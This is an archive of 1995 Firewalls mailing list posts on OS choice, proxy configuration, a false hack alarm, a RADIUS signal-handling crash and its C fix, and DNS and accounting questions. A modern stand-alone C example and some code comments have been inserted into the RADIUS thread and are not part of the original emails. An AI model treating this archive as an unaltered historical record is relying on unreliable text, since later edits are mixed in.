From firewalls-owner Tue Sep 5 13:32:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA07807 for firewalls-outgoing; Tue, 5 Sep 1995 13:26:37 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA07800 for ; Tue, 5 Sep 1995 13:26:34 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Tue, 05 Sep 1995 20:00:06 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;938:950905200006] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #514 Message-Id: <938*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509051449.HAA24879*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Tue Sep 5 15:02:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA10932 for firewalls-outgoing; Tue, 5 Sep 1995 14:59:46 -0700 Received: from UnixServer.doulosgeri.com (UnixServer.doulosgeri.com [199.72.163.25]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA10925 for ; Tue, 5 Sep 1995 14:59:40 -0700 Received: from ralph by UnixServer.doulosgeri.com with SMTP (8.6.12/25-eef) id RAA01223; Tue, 5 Sep 1995 17:57:43 GMT Message-Id: <199509051757.RAA01223@UnixServer.doulosgeri.com> Comments: Authenticated sender is From: "Marius" Organization: Doulos Productions To: Karl Strickland Date: Tue, 5 Sep 1995 17:56:28 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: linux vs. 
*bsd for secure networking system Reply-to: Marius@doulosgeri.com CC: firewalls@greatcircle.com Priority: normal X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Ahh, but in defense of Linux, the distribution isn't really all that important. If you get a Linux distribution, you should only consider it as the base that you work around. The kernel itself is the same, and you can get any file from any distribution off of some of the many Linux related FTP sites. You can also get files that aren't distributed or that are just written off of FTP sites. Centralization is nice, but with Linux, one of the main advantages is that it isn't centralized. If you look in the right places, which are easy to find if you talk to others in Linux mailing lists or newsgroups, you can get stuff to do practically anything you could imagine. It also has a nice set of HOWTO's and FAQ's that are easily accessible off of the web, and most CD-ROM distributions (if you go that route) contain the HOWTO's and FAQ's.

Linux has its strong and weak points, just like everything else does, but I just wanted to say a few words in its defense...

> From: Karl Strickland
> Subject: Re: linux vs. *bsd for secure networking system
> To: Paul McMahan
> Date: Sat, 2 Sep 1995 02:30:38 +0100 (BST)
> Cc: firewalls@greatcircle.com
>
> Hello,
>
> > I know that the linux vs. (free|net)bsd question is the subject of
> > ongoing debates outside the realm of firewalls, but I'm interested
> > specifically in the security aspects of these operating systems.
>
> Remember, if you go for Linux, you have to decide *which* linux to go for -
> there are at least 7 different distributions - some of which are very
> different. And then, when a hole is discovered, you have to find patches
> that work with your obscure distribution & version.
> > FreeBSD has controlled releases, and is developed in a controlled, structured > manner; all security-related changes to the system must undergo peer review > before a commit is made. > > This alone would put FreeBSD higher up my list. > -- > ------------------------------------------+----------------------------------- > Mailed using ELM on FreeBSD | Karl Strickland > PGP 2.3a Public Key Available. | Internet: karl@bagpuss.demon.co.uk > | > > Marius@doulosgeri.com No opinions expressed by the author are shared by Doulos Productions, The Third Wave, or any affiliated parties. The author doesn't see why not... Finger root@doulosgeri.com for PGP public key. From firewalls-owner Tue Sep 5 16:02:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA11581 for firewalls-outgoing; Tue, 5 Sep 1995 15:41:16 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA11574 for ; Tue, 5 Sep 1995 15:41:10 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA23382; Wed, 6 Sep 1995 08:35:08 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma023314; Wed Sep 6 08:34:56 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA12780; Wed, 6 Sep 1995 08:40:17 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9509052240.AA12780@citecub.citec.qld.gov.au> Subject: Re: FTP Proxy not working with Netscape To: plupa@sparky.sdd.tracor.com (Paul Lupa X4184) Date: Wed, 6 Sep 95 8:40:15 EST Cc: firewalls@greatcircle.com In-Reply-To: <199509051859.NAA09193@brazos.sdd.tracor.com>; from "Paul Lupa X4184" at Sep 5, 95 1:59 pm X-Mailer: ELM [version 2.3 PL11] content-length: 1270 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, You have probably configured the proxies in netscape the same way I did when I first started 
playing. You have configured the proxies to point to the ftp-gw, haven't you? It does not work. The Netscape config must point the FTP to the http-gw, not the ftp-gw. Thus your Netscape proxy config should look like this:

FTP Proxy: bastion 80
Gopher Proxy: bastion 70 **
HTTP Proxy: bastion 80 **

I have the http-proxy listening on port 70 for gopher and 80 for http.

As far as I know Netscape does not support telnet via proxies - the PC version just kicks off whatever telnet application is available under windows. Then you just telnet to the bastion as you normally would.

Colin

> I have installed the TIS firewall kit but I now have a problem with Proxies on
> Netscape. The HTTP proxy works fine, I can manually get thru the
> telnet and ftp proxy, but netscape does not get thru. The logs from
> the proxy show activity, but the logs do not show a denial.
>
> Help would be appreciated. I will summarize.
>
> Paul Lupa
> ------------------
> Tracor Applied Sciences Internet: Paul_Lupa@tracor.com
> 6500 Tracor Ln MS 27-17 Voice: (512) 929-4184
> Austin, Texas 78725 FAX: (512) 929-4163
>

From firewalls-owner Tue Sep 5 16:30:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12361 for firewalls-outgoing; Tue, 5 Sep 1995 16:22:31 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA12352 for ; Tue, 5 Sep 1995 16:22:28 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzfyb14882; Tue, 5 Sep 1995 19:21:07 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA15350; Tue, 5 Sep 95 19:13:32 EDT Date: Tue, 5 Sep 1995 19:13:31 -0400 (EDT) From: Sick Puppy Subject: Re: Nasty hackerz having busy weekend *** False alarm To: firewalls@GreatCircle.com In-Reply-To: <9509052003.AA25868@dns-primary.montgomery.com.> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Now you all may recall that ever since Bellcore gave me a lick in the head with a two by four because I was chasing their chickens, I have not been in full possession of my faculties. Most recently I told you all that there was a fox in the chicken coop at UUnet and it turns out there was nothing of the kind. I apologize to UUnet for saying there was nasty hackerz in their system. I trusted a stupid firewall that was completely wrong.

What was really happening is that a VERY fast firewall was connecting to their name server and then timing out before it received a response from the UUnet name server. This happens to be the same firewall machine that one firewall expert said had been attacked by aliens. Anyway, the name server responded to the firewall at normal speed, but slower than the VERY fast firewall expected, and the firewall squawked that it had been hacked. The vendor concerned has a later software release that does not have this problem.

To be fair to UUnet, they really provide superior service compared to one of the other Internet service providers that I previously had the misfortune to deal with, and UUnet responded to and diagnosed this incident very quickly.

You see what I got for trusting a stupid firewall? If I had put a Network General Notebook Sniffer on the Internet connection, it would have shown me in 10 to 15 minutes that the VERY fast firewall was seeing the normal name server as a slow server. In Dawg and Sniffers we trust, all others pay cash. (Dawg is Gwad spelled backwards).

Cowboy Jeff, who also had a hand in this fiasco, is going to feel my fangs in his eminent posterior.

And to end on a lighter note, those of you who are into scatological jokes should play with the word Starship in the tag lines. The rest of you had better not bother.
Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter -=:( Chained, whipped, beaten and severely abused in Katherine's Dungeon ):=- -=:( How could anything that feels so good be so wrong ):=- From firewalls-owner Tue Sep 5 16:32:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12259 for firewalls-outgoing; Tue, 5 Sep 1995 16:13:06 -0700 Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA12246 for ; Tue, 5 Sep 1995 16:12:55 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.7.Beta.10/8.6.12) id AAA16554 for firewalls@greatcircle.com; Wed, 6 Sep 1995 00:11:20 +0100 (BST) From: Steve Kennedy Message-Id: <199509052311.AAA16554@ford.gbnet.org> Subject: Re: Use of Remote Authentication: tacacs/radius/etc... (fwd) To: firewalls@greatcircle.com Date: Wed, 6 Sep 1995 00:11:19 +0100 (BST) X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here are details of the Livingston/Merit/Ascend RADIUS problems ... According to Jim Segrave (jes@demon.net) > According to William Bulley > > Merit is a large ISP (serving the State of Michigan with thousands if not > > millions of dial-up users) and we use the Merit version of RADIUS heavily. > > I would be very interested in understanding this "serious bug in the socket > > handling code" in the Merit version of RADIUS. Thank you! > > Regards, > > web... [stuff deleted] > We weren't using the Merit code, we were using code taken from > Ascend's modifications to the Livingstone reference > implementations. However, I have pulled down a copy of the Merit code > and the same problem is there as well. 
> There are two issues here, one
> flawed, the other fatally wrong and they brought our system to a
> complete halt at 18:00 when several hundred users attempted to log in
> within a 10 minute period (BT in the UK drops the call charges
> significantly on weekday nights at 6PM, so many of our users, who have
> home accounts, wait for the drop in charges).
>
> The Ascend/Livingstone code spawns a process per Radius request. The
> parent process notes the child pid and, when the child completes, the
> SIGCHLD is caught and used to mark the request as completed. After a
> short timeout, the request is deleted from memory. If the child fails
> to complete in a reasonable period of time (default is 30 seconds),
> the parent sends a kill to the child and deletes the request. The
> server limits itself to a certain number of child processes - 100 in
> this case.
>
> If the parent fails to catch the SIGCHLD, one of these 100 slots for
> processing is gone for the next 30 seconds. The signal handler in the
> Ascend, Livingstone and Merit implementations uses signal(), not one of
> the most reliable methods - cf. 'Advanced Programming in the Unix
> Environment' by W. Richard Stevens, chapter 10 for details. This alone
> can cause SIGCHLDs to be lost and starve the server of process slots
> for incoming requests.
>
> The above is merely an annoyance however.
>
> More serious problems occur if you look at the SIGCHLD handler. First
> off, it traverses and alters the global_acct_q and the
> global_request_q, even though the signal may have interrupted code
> which is traversing and altering the same queue.
>
> Even worse than that, on line 1618 of the source I got from merit.edu,
> I find a call to free(). That's exciting to say the least - I'm not
> aware of any requirement that free and malloc be interruptible and
> re-entrant. The results of this one are usually fatal.
> The fix I made with the Ascend code was to move the entire body of the
> SIGCHLD handler out of the signal handler and into the main event
> loop. SIGCHLD now is a simple minded handler:
>
> #include <signal.h>
> #include <errno.h>
>
> /* volatile: the main loop polls this flag, so the compiler must re-read it */
> volatile sig_atomic_t dead_child = 0;
>
> void sigchild (int signal)
> {
>     dead_child = 1;
> }
>
> and in the main loop:
>
> while (1)
> {
>     /* set up fd_set and select on socket(s) */
>
>     if ((res = select (...)) < 0)
>     {
>         if (errno != EINTR)
>         {
>             syslog (...);
>         }
>
>         if (dead_child)
>             do_sigchild ();
>
>         continue;
>     }
>
>     /* rest of main loop */
> }
>
>
> void
> do_sigchild (void)
> {
>     sigset_t set, oldset;
>
>     sigemptyset (&set);
>     sigaddset (&set, SIGCHLD);
>     if (sigprocmask (SIG_BLOCK, &set, &oldset) < 0)
>     {
>         syslog (....);
>     }
>
>     /* do the child death stuff here, with SIGCHLD blocked */
>
>     dead_child = 0;
>     /* restore the mask saved above; blocking SIGCHLD a second time here
>        would leave it blocked for good, and no later child death would
>        ever be noticed */
>     if (sigprocmask (SIG_SETMASK, &oldset, NULL) < 0)
>     {
>         syslog (....);
>     }
> }
>
>
> After which, using a single server with a large collection of small
> flat files representing our customer base of 40000 hosts, I ran 50
> processes, each sending an authentication request for a randomly
> chosen user, delaying one second and doing it again. Over the course
> of an 8 hour run a single Sparcstation 10 handled 500.000 such
> requests at an average of 18 requests/second without a single error -
> there were some deliberate non-users thrown in as well.
>
> The original Ascend code died repeatedly in the face of less than 100
> requests at this rate. At lower rates, it seemed to survive, but I was
> logging a lot of requests dropped because all 100 process slots were
> still in use, and a lot of kills being sent to non-existent
> processes. Sooner or later, it almost invariably dumped core,
> presumably when a malloc or free was interrupted by a SIGCHLD.

Please note this came from Jim Seagrave who has been developing the RADIUS code at Demon Internet Ltd NOT myself. I am just posting this FYI so hopefully others won't be caught by this.
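A stand-alone C version of the deferred-reaping pattern described in the quoted post, added here as an example and not code from Jim Segrave or any RADIUS server: the handler only sets a flag and writes a byte to a self-pipe (the self-pipe is an assumption beyond the post, which relied on select() returning EINTR), the request table is modified only from the main loop with SIGCHLD blocked, and looping on waitpid(-1, WNOHANG) copes with several child exits collapsed into one signal. The slot count of 8 and the 5 ms workers are constructed for the demo.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/select.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define MAX_SLOTS 8  /* constructed: stands in for the server's 100 process slots */
struct request { pid_t pid; int active; };
static struct request slots[MAX_SLOTS];       /* the queue a handler must never walk */
static volatile sig_atomic_t dead_child = 0;  /* set in the handler, read by the loop */
static int wake_pipe[2];                      /* self-pipe so select() wakes reliably */

/* Handler does only async-signal-safe work: no queue traversal, no free(). */
static void sigchld_handler(int sig)
{
    int saved = errno;
    (void)sig;
    dead_child = 1;
    if (write(wake_pipe[1], "x", 1) < 0) { /* nothing safe to do in a handler */ }
    errno = saved;
}

/* Reap in main-loop context with SIGCHLD blocked, so the table is never changed
 * underneath a handler. Looping on waitpid(-1, WNOHANG) also reaps children whose
 * exits were coalesced into one SIGCHLD. Returns slots freed, or -1 on error. */
int reap_children(void)
{
    sigset_t set, oldset;
    int freed = 0;
    sigemptyset(&set); sigaddset(&set, SIGCHLD);
    if (sigprocmask(SIG_BLOCK, &set, &oldset) < 0) return -1;
    dead_child = 0;
    for (;;) {
        int status;
        pid_t pid = waitpid(-1, &status, WNOHANG);
        if (pid <= 0) break;
        for (int i = 0; i < MAX_SLOTS; i++)
            if (slots[i].active && slots[i].pid == pid) { slots[i].active = 0; freed++; }
    }
    sigprocmask(SIG_SETMASK, &oldset, NULL);  /* restore the saved mask, don't block again */
    return freed;
}

/* Fork a worker that "serves" one request for work_ms, then exits. Returns the
 * slot index, -1 if the table is full (request dropped), -2 if fork() failed. */
int spawn_request(int work_ms)
{
    int i = 0;
    while (i < MAX_SLOTS && slots[i].active) i++;
    if (i == MAX_SLOTS) return -1;
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) {
        struct timespec ts = { 0, (long)work_ms * 1000000L };
        nanosleep(&ts, NULL);
        _exit(0);
    }
    slots[i].pid = pid; slots[i].active = 1;
    return i;
}

/* Event loop: push n requests through the slot table, reaping only from here.
 * Returns the number of children reaped, or -1 on error. */
int run_server(int n)
{
    struct sigaction sa;
    int spawned = 0, reaped = 0;
    if (pipe(wake_pipe) < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = sigchld_handler;
    sigemptyset(&sa.sa_mask); sa.sa_flags = SA_NOCLDSTOP;
    if (sigaction(SIGCHLD, &sa, NULL) < 0) return -1;
    while (reaped < n) {
        while (spawned < n) {                 /* refill free slots */
            int r = spawn_request(5);
            if (r == -2) return -1;
            if (r < 0) break;                 /* table full: wait for a slot to free */
            spawned++;
        }
        fd_set rfds; FD_ZERO(&rfds); FD_SET(wake_pipe[0], &rfds);
        int res = select(wake_pipe[0] + 1, &rfds, NULL, NULL, NULL);
        if (res < 0 && errno != EINTR) return -1;
        if (res > 0) {                        /* drain the wake-up byte(s) */
            char buf[64];
            if (read(wake_pipe[0], buf, sizeof buf) < 0 && errno != EINTR) return -1;
        }
        if (dead_child) {                     /* all the handler did was raise this flag */
            int freed = reap_children();
            if (freed < 0) return -1;
            reaped += freed;
        }
    }
    close(wake_pipe[0]); close(wake_pipe[1]);
    return reaped;
}

int main(void) { return run_server(20) == 20 ? 0 : 1; }
```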
Regards Steve Kennedy -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500 bits steve@gbnet.net * GSM data @2400 0802-449500 @9600 449501 fax 449502 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Tue Sep 5 20:00:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA16070 for firewalls-outgoing; Tue, 5 Sep 1995 19:47:40 -0700 Received: from awadi.com.AU (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA16063 for ; Tue, 5 Sep 1995 19:47:26 -0700 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA07700; Wed, 6 Sep 95 12:13:40 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA17739; Wed, 6 Sep 1995 12:06:36 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9509060236.AA17739@bunya.awadi> Subject: Re: linux vs. *bsd for secure networking system To: Marius@doulosgeri.com Date: Wed, 6 Sep 1995 12:06:36 +0930 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <199509051757.RAA01223@UnixServer.doulosgeri.com> from "Marius" at Sep 5, 95 05:56:28 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Marius: > >weak points, just like everything else does, but I just wanted to say >a few words in its defense... > A very reasonable response! And to redress Karl's omission - you can also go the path of NetBSD which, unlike FreeBSD, has ports to a whole gaggle of different machines - not just PC's. The ports that are running are listed on the WWW page at www.netbsd.org, ones I can remember are Mac, Suns, Amiga, some HP boxen - there are others. 
-- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures".

From firewalls-owner Wed Sep 6 00:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19347 for firewalls-outgoing; Tue, 5 Sep 1995 23:43:49 -0700 Received: from neptunus.rivm.nl (neptunus.rivm.nl [131.224.2.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA19340 for ; Tue, 5 Sep 1995 23:43:44 -0700 From: Rens.Schipper@rivm.nl Received: from ccmail.rivm.nl by neptunus.rivm.nl with SMTP (PP); Wed, 6 Sep 1995 08:41:05 +0200 Received: from cc:Mail by ccmail.rivm.nl id AA810402041; Wed, 06 Sep 95 08:39:42 CET Date: Wed, 06 Sep 95 08:39:42 CET Message-Id: <9508068104.AA810402041@ccmail.rivm.nl> To: netmgr02@cbe.ab.ca, firewalls@greatcircle.com Subject: Re: Talk Proxy??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi Glen,

You could make a fairly easy work-around. Let remote users do a TELNET session to an internal (or in the DMZ) server where they can logon. On this server you start a TALK session to a user-definable internal user@host. (Don't give them a shell!!) This way you have only the telnet protocol over the firewall and the performance of TCP. Last but not least, you can use all authentication techniques already available for your regular telnet session.

Just a thought,

Rens Schipper

______________________________ Reply Separator _________________________________
Subject: Re: Talk Proxy???
Author: Brent@GreatCircle.COM (Brent Chapman) at SMTP Date: 5/9/95 21:15

At 11:58 AM 9/5/95, Glen Larwill wrote:
>Has anyone created a Talk proxy that works with the TIS FWTK? We have a
>large number of users that are complaining because our firewalls cannot
>handle Talk.

From firewalls-owner Wed Sep 6 00:30:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA19604 for firewalls-outgoing; Wed, 6 Sep 1995 00:11:01 -0700 Received: from bass.com.my (bass.com.my [161.142.248.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA19597 for ; Wed, 6 Sep 1995 00:10:50 -0700 Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA17983 (5.67a/IDA-1.5 for ); Wed, 6 Sep 1995 15:09:31 +0800 Received: by bass.bass.com.my (4.1/SMI-4.1) id AA26135; Wed, 6 Sep 95 15:07:16 MYT Date: Wed, 6 Sep 1995 14:46:05 +0800 (MYT) From: Tham Huei Hwan Subject: DNS problem on Netra i To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,

Anybody have any idea what is going wrong on my Netra i Internet server? My Netra i is set up with the ip address 200.200.9.1 and with the domain name abc.com.my. My Internet Network Provider (INP) is jaring.my and the ip address is 192.228.128.20. When I use the nslookup command, it gives me the following messages:

#nslookup
*** Can't find server name for address 200.200.9.1: Non-existent domain
Default Server: jaring.my
Address: 192.228.128.20

>server 200.200.9.1
Default Server: [200.200.9.1]
Address: 200.200.9.1

>set type=ns
>abc.com.my
Server: [200.200.9.1]
Address: 200.200.9.1

*** No name server (NS) records available for abc.com.my

Anyway, my server can access the Internet and send E-mail without any problem, but the outside world cannot send E-mail to this server.

Thanks.
From firewalls-owner Wed Sep 6 05:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA24003 for firewalls-outgoing; Wed, 6 Sep 1995 05:24:10 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA23996 for ; Wed, 6 Sep 1995 05:24:07 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Wed, 06 Sep 1995 01:20:01 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;939:950906012001] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #515 Message-Id: <939*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509052333.QAA12533*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Wed Sep 6 07:09:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24897 for firewalls-outgoing; Wed, 6 Sep 1995 06:41:22 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA24890 for ; Wed, 6 Sep 1995 06:41:18 -0700 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA28601; Wed, 6 Sep 95 08:59:38 CDT Received: by mnbp.network.com with Microsoft Mail id <304DA3E2@mnbp.network.com>; Wed, 06 Sep 95 08:36:34 CDT From: Greg Brennan To: firewalls mailing list Subject: FW: Accounting System Date: Wed, 06 Sep 95 08:36:00 CDT Message-Id: <304DA3E2@mnbp.network.com> Encoding: 25 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subject: Accounting System >Date: August 22, 1995 10:38PM > >Does anyone 
know a package that could do accounting of the traffic, by
>source and destinations (like CISCO routers do) but identifying the
>service (FTP, TELNET, HTTP, etc.)
>
>Fernando Cozinheiro http://sweet.ua.pt/~cooker/
>System & Network Administrator Email: cooker@ci.ua.pt

Yes. Packet Control Facility (PCF) runs on Network Systems routers and can be set up to provide you with those details. Check out the web site at http://www.network.com

Greg Brennan
________________________________
Greg Brennan | Network Systems Corp. (Canadian Office)
Manager, Business Partner Solutions | 5710 Timberlea Blvd., Suite 207
Internet: greg.brennan@network.com | Mississauga, Ontario L4W 4W1
Voice: (905) 629-0440 | "Secure Networks-On-Demand"TM
Fax: (905) 629-0435 | http://www.network.com

From firewalls-owner Wed Sep 6 08:32:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA26197 for firewalls-outgoing; Wed, 6 Sep 1995 08:13:59 -0700 Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA26190 for ; Wed, 6 Sep 1995 08:13:56 -0700 Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.6.11/8.6.4) id LAA28761 for firewalls@GreatCircle.COM; Wed, 6 Sep 1995 11:12:26 -0400 From: Jeff Murphy Message-Id: <199509061512.LAA28761@smurfland.cit.buffalo.edu> Subject: Re: FW: Accounting System To: firewalls@GreatCircle.COM Date: Wed, 6 Sep 1995 11:12:25 -0400 (EDT) In-Reply-To: <304DA3E2@mnbp.network.com> from "Greg Brennan" at Sep 6, 95 08:36:00 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 554 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>Does anyone know a package that could do accounting of the traffic, by
>source and destinations (like CISCO routers do) but identifying the
>service (FTP, TELNET, HTTP, etc.)
There are several packages available to do this, including Netramet (which is an implementation of the Internet accounting architecture). Lists of available packages can be found on http://smurfland.cit.buffalo.edu/NetMan/index.html in "The Archives". Here at UB, we wrote a small program based on libpcap (ftp.ee.llnl.gov) that does accounting based on port.

From firewalls-owner Wed Sep 6 10:02:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA27735 for firewalls-outgoing; Wed, 6 Sep 1995 09:36:10 -0700 Received: from uucp.intac.com (uucp.intac.com [198.6.114.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA27728 for ; Wed, 6 Sep 1995 09:36:06 -0700 Received: from cdssrv.UUCP (uucp@localhost) by uucp.intac.com (8.6.5/8.6.5) with UUCP id MAA07575 for greatcircle.com!firewalls; Wed, 6 Sep 1995 12:07:07 -0400 Received: from cdshpa.chesapeake.com by cdssrv.chesapeake.com id aa08840; 6 Sep 95 11:51 EDT Received: by cdshpa.chesapeake.com (1.37.109.4/16.2) id AA02949; Wed, 6 Sep 95 11:48:06 -0400 From: Matt Hagadorn Subject: Where to put Internet Services? To: firewalls@greatcircle.com Date: Wed, 6 Sep 95 11:48:05 EDT Reply-To: msh@chesapeake.com Mailer: Elm [revision: 70.85] Message-ID: <9509061151.aa08840@cdssrv.chesapeake.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I've been reading this list for a while and reading (and trying to understand) as much of the firewall books/materials I can get my hands on, but there's something I'm having difficulty grasping.

My company is looking at getting a "real" connection to the Internet (surprise!) and since I'm the network guy I get to learn more than I ever wanted to know about firewalls. The part I don't understand is where you would place application services (WWW server and anon FTP server for outside customers to access) in the case of a dual-homed gateway or a screened-host firewall.
In the case of a dual-homed firewall, I would assume the FTP and WWW server software would be directly on the firewall machine? Is this a security risk? Or do you just provide an incoming proxy on the firewall that points to an inside machine running the httpd or ftpd servers?

In the case of the screened host implementation, do the services go on the bastion host, or does it simply offer an incoming proxy service to the real machine running the WWW or FTP software? I don't see configuring the router to allow incoming FTP or http traffic to a host other than the bastion, otherwise you're no longer running a screened host type of firewall. Am I right?

Any insights would be appreciated.

Matt
--
Matt Hagadorn Chesapeake Decision Sciences, Inc. email: msh@chesapeake.com

From firewalls-owner Wed Sep 6 10:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA29374 for firewalls-outgoing; Wed, 6 Sep 1995 10:28:41 -0700 Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA29367; Wed, 6 Sep 1995 10:28:37 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 6 Sep 1995 10:27:49 -0800 To: msh@chesapeake.com, firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Where to put Internet Services? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 11:48 AM 9/6/95, Matt Hagadorn wrote:
